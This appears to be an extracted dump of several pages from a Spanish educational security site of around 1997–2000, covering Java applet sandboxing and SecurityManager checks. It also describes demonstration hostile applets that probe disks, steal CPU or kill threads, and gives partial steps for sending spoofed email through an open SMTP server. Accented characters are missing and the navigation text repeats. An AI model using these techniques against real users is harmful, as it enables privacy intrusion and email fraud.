Esta es una applet para Netscape Communicator que intentar leer propiedades del
sistema y acceder a disco. Primero debes instalar mi certificado.
Para que la applet funcione correctamente debes crear antes un fichero en el disco c:
en el directorio raz llamado test.txt, ya que la applet intentar abrir un fichero
con ese nombre en esa ubicacin. El contenido del fichero puede ser cualquiera. Una
vez que lo hayas creado, tendrs que cerrar las sesiones abiertas con Netscape y
volver a esta pgina y entonces ya s se leer.
Control de acceso
Java
JavaScript
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Renegado de Netscape
Consejos prcticos
Referencias
Libro de Visitas
file:///C|/TEMP/criptonomicon/criptonomicon/images/advertenciaie.gif
file:///C|/TEMP/criptonomicon/criptonomicon/images/alerta.gif
file:///C|/TEMP/criptonomicon/criptonomicon/images/certificadoie.gif
Suscripcin gratis
Intimidad?
Renegado de Microsoft
Artculos
Seguridad
Linux
Navegacin segura
Para que la applet funcione correctamente debes crear antes un fichero en el disco c:
en el directorio raz llamado test.txt, ya que la applet intentar abrir un fichero
con ese nombre en esa ubicacin. El contenido del fichero puede ser cualquiera. Una
vez que lo hayas creado, pulsa el botn de Actualizar y entonces s se leer. Debes
tener Java desactivado. Si quieres ver cmo funciona la firma digital, actvalo! Aqu
est el cdigo fuente y el fichero de configuracin de permisos.
Control de acceso
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
CGI
Java
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Almacenamiento en cliente
Suscripcin gratis
Intimidad?
Almacenamiento en cliente
Artculos
Esta applet utiliza el rea de almacenamiento de cliente para realizar sus actividades.
Seguridad
Navegacin segura
Control de acceso
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Almacenamiento en cliente
Consejos prcticos
Referencias
Libro de Visitas
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Consejos
Recursos
La evolucin lgica del modelo anterior lleg a travs del JDK 1.1.x, al introducir el
concepto de applet firmada. En este modelo extendido, una applet con firma digital
vlida se trata como si fuera cdigo de confianza cargado localmente siempre y
cuando la firma digital sea reconocida como de confianza por el sistema final que
recibe la applet. Estas applets firmadas, junto con sus firmas, son enviadas en
formato JAR (Java Archive). Se puede ver una representacin grfica de este nuevo
modelo en la simptica figura de Li Gong.
La primera edicin de Seguridad en Java, disponible con el JDK 1.1, contena APIs
para:
Firmas digitales: algoritmos de firma digital, como DSA. Su funcionalidad
inclua generacin de pares de clave pblica/privada, as como firma y
verificacin de datos digitales arbitrarios.
Resmenes de mensajes: resmenes de mensajes criptogrficamente seguros,
tales como MD5 y SHA-1. Estos algoritmos, tambin llamados algoritmos de
hash unidireccional, son tiles para producir "resmenes digitales" de los
datos, usados frecuentemente en firmas digitales y otras aplicaciones que
requieren identificadores nicos e infalsificables de datos digitales.
Gestin de claves: conjunto de abstracciones para gestionar principales
(entidades tales como usuarios individuales o grupos), sus claves y sus
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Consejos
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
file:///C|/TEMP/criptonomicon/criptonomicon/images/jdk11.jpg
Robo de informacin
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Robo de informacin
Consejos
Recursos
Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Descripcin
Comprueba si se puede borrar el fichero de
nombre String.
Comprueba si se puede leer el fichero
checkRead
(FileDescriptor)
indicado por FileDescriptor.
Comprueba si se puede leer el fichero de
checkRead(String)
nombre String.
checkRead(String, Object) Comprueba si se puede leer el fichero en el
contexto de seguridad actual.
Comprueba si se puede escribir el fichero
checkWrite
(FileDescriptor)
indicado por FileDescriptor.
Robo de informacin
checkWrite(String)
checkFileDialog()
checkExec(String)
checkExit(int)
CheckPropertiesAccess()
CheckPropertyAccess
(String)
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Destruccin de informacin
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Destruccin de informacin
Consejos
Recursos
checkRead
(FileDescriptor)
checkRead(String)
checkRead(String,
Object)
checkWrite
(FileDescriptor)
checkWrite(String)
Descripcin
Comprueba si se puede borrar
el fichero de nombre
String.
Comprueba si se puede leer el
fichero indicado por
FileDescriptor.
Comprueba si se puede leer el
fichero de nombre String.
Comprueba si se puede leer el
fichero en el contexto de
seguridad actual.
Comprueba si se puede
escribir el fichero indicado
por FileDescriptor.
Comprueba si se puede
escribir el fichero de nombre
String.
Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao
Lnea Maginot
Destruccin de informacin
checkFileDialog()
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Robo de recursos
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Robo de recursos
Consejos
Recursos
Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Es ste el aspecto ms difcil de controlar en Java, ya que las
Engao
applets pueden hacer uso ilimitado de ciclos de CPU, en algunos
Lnea Maginot
casos ralentizando el funcionamiento de tu mquina y hacindote
perder tiempo (por qu hoy compilarn tan lentos los programas? No tendrs el
navegador abierto en otra ventana, verdad? Podra ser el responsable, tras haber
descargado una applet maliciosa).
Resultara muy instructivo que te pasases por una pgina en la que vers cmo una
applet roba recursos de tu sistema para sus propios fines, como por ejemplo realizar
clculos intensivos de factorizacin. Y ya sabis la relacin que existe entre
factorizar y reventar claves, no?
Se trata en definitiva de un problema sin fcil solucin.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Denegacin de servicio
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Denegacin de servicio
Consejos
Recursos
Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Enmascaramiento
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Enmascaramiento
Consejos
Recursos
Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao
Lnea Maginot
Una applet de Java es capaz de abrir un socket a dicho puerto 25 y
a partir de ah, seguir todos los pasos del protocolo y enviar as un correo falso.
Tambin posis consultar un applet de Java que acta como sencillo remailer. Esa
applet se puede adaptar sin mucho trabajo para que cuando la cargues desde una
pgina cualquiera en la Red, enve un correo DESDE TU MQUINA sin que t te
enteres en absoluto. Te imaginas lo que eso puede suponerte?
Nota: Por supuesto, que para ello, tu mquina debe monitorizar el puerto 25, no servira si usa un
cliente de POP Mail.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Engao
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Engao
Consejos
Recursos
Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao
Lnea Maginot
Una forma ms sofisticada de engao consiste en falsificar
ventanas del sistema, para obligar al usuario a que ejecute una accin que de otro
modo no realizara, como rearrancar el ordenador (perdiendo los datos) o suministrar
su login y password.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Consejos
Recursos
Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao
Lnea Maginot
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Ofuscacin de cdigo
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Ofuscacin de cdigo
Consejos
El problema
Recursos
Ataques
Robo de informacin
La solucin
La manera ms extendida entre los desarrolladores de aplicaciones Java para poner
coto a esta ingeniera inversa y evitar la violacin de sus derechos de autor consiste
en ofuscar el cdigo, esto es, oscurecerlo de forma tal que resulte prcticamente
imposible decompilarlo e incluso interpretarlo correctamente aun si se obtiene el
cdigo fuente por el procedimiento que fuera. Esta ofuscacin se consigue en la
prctica por medio de la inclusin de bucles irrelevantes, clculos innecesarios,
comprobaciones absurdas, nombres de funciones y de variables que no tienen nada
que ver con su cometido, funciones largusimas que no sirven para nada,
interacciones inverosmiles entre variables y funciones, etc.
No conviene olvidar que los ofuscadores no tienen nada que ver con la seguridad en
los programas, simplemente aaden grandes complicaciones al proceso de
decompilacin y posterior interpretacin del cdigo fuente de los programas. Nunca
se debe confiar en ellos para implementar mecanismos de seguridad, fieles a la
Ofuscacin de cdigo
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Intimidad?
Artculos
Seguridad
Aunque Java est diseado para evitar ciertas acciones maliciosas que puedan
engaar a los usuarios, existen pequeas trampas para saltarse las barreras.
En concreto, el gestor de seguridad de Java controla la creacin de nuevas ventanas
desde un applet, con el fin de que no puedan engaar al usuario, que podra pensar
que pertenecen a una aplicacin de fiar en vez de al applet desde el que han sido
abiertas. Estas ventanas podran presentar mensajes a los usuarios en los que se les
pidiera introducir el login y password porque ha ocurrido un error general del
sistema, por ejemplo.
A estas alturas ya habrs notado una pantalla azul, verdad?
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Crashes
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Una manera muy sencilla de enviar correos annimos sin necesidad de utilizar
repetidores es conectarse a un servidor de SMTP a travs de Internet, simplemente
haciendo un TELNET al puerto 25.
Los pasos a seguir son los siguientes:
1) Localizar un servidor de SMTP lo suficientemente antiguo como para no incluir
en las cabeceras del correo que enva la direccin de la mquina que se le conect.
En el ejemplo, llamaremos a esta mquina aaa.bbb.ccc
Sin duda, ste es el paso ms difcil de todos. Sin un servidor as no es posible enviar
correos annimamente. Puedes comprobar los siguientes servidores, a ver si alguno
sirve todava.
2) Busca para ti un nombre cualquiera de mquina (direccin IP), pero que exista.
Puede servir uno cualquiera de FTP, HTTP, o lo que sea. Ser tu direccin IP falsa, a
la que llamaremos xx.yy.zz.
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Con esto ya habras enviado un correo y cerrado la sesin con el host. Espera a que te
llega el mail y examina las cabeceras para ver si ha quedado rastro de tu direccin de
mquina o algo que te delate. Si fuera as, vuelve al paso 1 y busca un servidor de
SMTP apropiado.
A modo de ejemplo, puedes utilizar el applet de demostracin en remailer sencillo.
Utilizando el applet, recibirs algo como
Received: from localhost (tu verdadera mquina) by
aaa.bbb.ccc (8.7.6/8.7.3) with SMTP id RAA08608 for ;
Tue, 3 Feb 1998 17:02:43 +0100
que desvela tu direccin, por lo ese servidor no puede ser usado para enviar correos
annimos. Sin embargo hay otros que s que lo son. Slo tienes que buscarlos.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
CGI
Java
JavaScript
Puedes ver el resultado leyendo el fichero de registro, donde se van almacenando los
datos que envan los contribuyentes (in)voluntarios a la computacin paralela.
Cookies
Nota: Si accedes varias veces al fichero de registro, no olvides pulsar el botn de Recargar la pgina, para que se actualice la ltima
modificacin.
Esta applet la he tomado de Mark LaDue.
Crashes
Agujeros
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Spam
Remailers
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
He aqu un ejemplo de cmo sin necesidad de tener acceso directo al sistema de ficheros, s que puedo en
la prctica hacerme una idea de cmo est organizado tu disco duro. Estos datos que voy recabando sobre
tu sistema me los podra enviar por correo electrnico, y as saber qu tipo de software tienes instalado
(p.e. si existe el directorio c:\msoffice es porque tendrs Office instalado; si existe el directorio c:\msdev
ser porque has instalado el Developer Studio para C++, J++, etc.). Os imaginis lo valiosos que pueden
ser estos datos en las manos de Bill Gates, para planificar sus campaas de marketing?
Volver a la seccin de agujeros
Barreras de seguridad
Agujeros
Lneas futuras
Consejos
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Barreras de seguridad
Agujeros
Lneas futuras
Consejos
Recursos
Descripcin
Se llama antes de aceptar una
conexin con un socket de la
mquina especificada en el puerto
especificado.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Barreras de seguridad
Agujeros
Lneas futuras
Consejos
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Mensajes de alerta
Barreras de seguridad
Agujeros
Lneas futuras
Consejos
Recursos
Restriccin de de manipulacin de
threads
Puedes ver un ejemplo de applet que se descarga sin que el usuario se d cuenta para
a partir de ese momento destruir todos los threads de otras applets.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Barreras de seguridad
Agujeros
Lneas futuras
Consejos
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Agujeros
Lneas futuras
Consejos
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Intimidad?
Artculos
Seguridad
Aunque Java est diseado para evitar manipulaciones de threads, de hecho s que se
pueden toquetear, como hace esta applet que sin saberlo has cargado. A partir de
ahora, no se ejecutar ningn applet de Java y ni siquiera aparecer la ventanita
avisando de que no tienes Java activado, por lo que t ni siquiera te enteraras de que
ests pasando por pginas que incluyan applets. Te das cuenta de qu forma de
sabotaje? Algunos sitios confan en Java para mejorar la presentacin de sus pginas.
Desgraciadamente para ellos, despus de visitar esta pgina que ahora ests leyendo,
adis a Java.
Esta applet no funciona en las versiones modernas de los navegadores (4.x). Pero en
las antiguas, tiene efectos a veces impredecibles, como colgar el navegador.
Linux
Navegacin segura
Control de acceso
Si te ha desactivado el Java, puedes cerrar el navegador (no basta con cerrar esta
ventana) si quieres que de nuevo funcione Java. Perdona las molestias. Es el precio
del conocimiento.
Esta applet la he tomado de Mark LaDue.
CGI
Java
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
file:///C|/TEMP/criptonomicon/criptonomicon/images/jdk102.jpg
Qu es Java
Prohibido
Agujeros
Lneas futuras
Consejos
Caractersticas del
lenguaje/compilador
Recursos
Gestor
tiempo).
Arrays con comprobacin de lmites
En Java los arrays son objetos, lo cual les confiere ciertas funciones muy
tiles, como la comprobacin de lmites. Para cada subndice, Java comprueba
si se encuentra en el rango definido segn el nmero de elementos del array,
previniendo as que se referencien elementos fuera de lmite
Referencias a objetos fuertemente tipadas
Impide conversiones de tipo y castings para evitar accesos fuera de lmites de
memoria (resolucin en compilacin)
Casting seguro
Slo se permite casting entre ciertas primitivas de lenguaje (ints, longs) y entre
objetos de la misma rama del rbol de herencia (uno desciende del otro y no al
revs), en tiempo de ejecucin
Control de mtodos y variables de clases
Las variables y los mtodos declarados privados slo son accesibles por la
clase o subclases herederas de ella y los declarados como protegidos, slo por
la clase
Mtodos y clases final
Las clases y los mtodos (e incluso los datos miembro) declarados como
final no pueden ser modificados o sobrescritos. Una clase declarada final no
puede ser ni siquiera extendida.
Pero, qu ocurrira si modifico un compilador de C para producir cdigos de byte de
Java, pasando por alto todas las protecciones suministradas por el lenguaje y el
compilador de Java que acabamos de describir?
Con el fin de evitar esa forma de ataque, se construy la segunda lnea de defensa, el
verificador de cdigo de bytes.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Verificador
Lenguaje
Cargador
Gestor
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Cargador de Clases
Lenguaje
Verificador
Cargador
Gestor
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Gestor de Seguridad
La gestin de seguridad la realiza la clase abstracta
SecurityManager, que limita lo que las applets pueden o no
hacer. Para prevenir que sea modificada por una applet maliciosa,
no puede ser extendida por las applets.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Funcionamiento de Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Funcionamiento de Java
El fichero de cdigo fuente puede ser escrito meidante cualquier
editor ascii convencional o, para mayor comodidad, con el editor
suministrado con el paquete del lenguaje Java.
Caractersticas de Java
Cmo funciona
Una vez creado el fichero .java con el cdigo del programa, se compila, generndose
un fichero intermedio con los bytecodes, de extensin .class.
Una vez generado el fichero .class, ste ya puede ser interpretado en cualquier
mquina virtual de Java. Tratndose de applets, este fichero se descargar
tpicamente desde la Red. Para indicrselo al navegador se utilizan unas etiquetas
especiales del lenguaje HTML:
<APPLET attributes>
applet_parameters
alternate_content
</APPLET>
Esta pgina Web en la que se encuentra embebida la applet la habremos bajado desde
la Red o bien la hemos cargado desde el disco duro. En cualquier caso, para ver la
applet funcionando hace falta un navegador capaz de ejecutar Java, como los muy
conocidos Netscape y Microsoft Internet Explorer.
El navegador carga las clases especificadas en la etiqueta <applet> dinmicamente, a
medida que van siendo necesitadas y se les pasa al cdigo fuente (a los bytecodes) el
verificador de cdigo de bytes.
Ahora ser ya la mquina virtual de Java la que vaya interpretando los bytecodes y
generando las instrucciones para su propia arquitectura.
Este funcionamiento se puede ver esquemticamente en la figura.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
file:///C|/TEMP/criptonomicon/criptonomicon/images/funcionamiento.gif
Consejos para
administradores
Consejos para
usuarios
hard
core
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
AUTOCOMPLETE="OFF">
En el caso de que slo se quiera desactivar el autocompletado en algunos campos
ms comprometidos del formulario y no en todos, puede utilizarse ese mismo
atributo en las etiquetas de los campos, por ejemplo:
<INPUT TYPE="PASSWORD" NAME="CLAVE" SIZE="15"
MAXLENGTH="15" AUTOCOMPLETE="OFF">
que desactivar autocompletar solamente en ese campo en concreto.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Listas Robinson
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
El primer precio que paga por esos servicios gratuitos de los portales es su
informacin personal. El caso de Alehop es casi patolgico: incluso exigen el
file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros18.html (2 of 4) [25/10/2000 02:32:00 p.m.]
Informacin adicional
Infobel: Espaa
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios
Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
amenaza?
La Gran Cookie nos
vigila
Histeria colectiva
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Principal
Riesgos
